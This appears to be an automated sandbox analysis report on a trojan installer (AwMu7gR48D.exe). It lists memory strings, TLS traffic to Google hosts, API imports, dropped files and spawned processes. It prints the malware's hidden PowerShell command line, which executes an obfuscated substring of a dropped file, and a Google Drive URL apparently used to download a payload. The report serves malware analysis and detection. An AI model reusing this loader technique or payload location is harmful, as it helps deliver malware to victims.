Source: msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadid
Source: msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadmp
Source: msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055912606.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadn.
Source: msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadnt
Source: msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloado1
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadoo
Source: msiexec.exe, 00000005.00000003.2445831272.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166300357.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248826838.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138530544.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194101706.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083732633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276930704.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417373844.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359320119.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332761660.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221471719.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadrT
Source: msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadx
Source: msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/ie
Source: msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/jd
Source: powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-ubM9
Source: msiexec.exe, 00000005.00000003.2613416047.0000000006206000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1941692265.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.0000000006206000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417373844.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359320119.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.0000000006206000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.000000000620A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

Code function: 0_2_00405194 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405194

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe

Jump to dropped file

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

Code function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004031BB

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Code function: 0_2_004049D3		0_2_004049D3
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Code function: 0_2_004065BB		0_2_004065BB

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll B91763928CE210BFC0A43B0AC1178D68CB95CFAD68439B25B55A53B7AA53B207
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll 01D867E3A1F0AEC39A4FF02FE9FAFEFC78D6A12390A0DA8ECBF4E7DA5379E42E

Source: AwMu7gR48D.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/14@2/2

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

0_2_004031BB

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

Code function: 0_2_00404460 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404460

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

Code function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,

0_2_004020CB

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

File created: C:\Users\user\AppData\Local\unshabbily

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

File created: C:\Users\user\AppData\Local\Temp\nsjE201.tmp

Jump to behavior

Source: AwMu7gR48D.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AwMu7gR48D.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

File read: C:\Users\user\Desktop\AwMu7gR48D.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\AwMu7gR48D.exe "C:\Users\user\Desktop\AwMu7gR48D.exe"
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
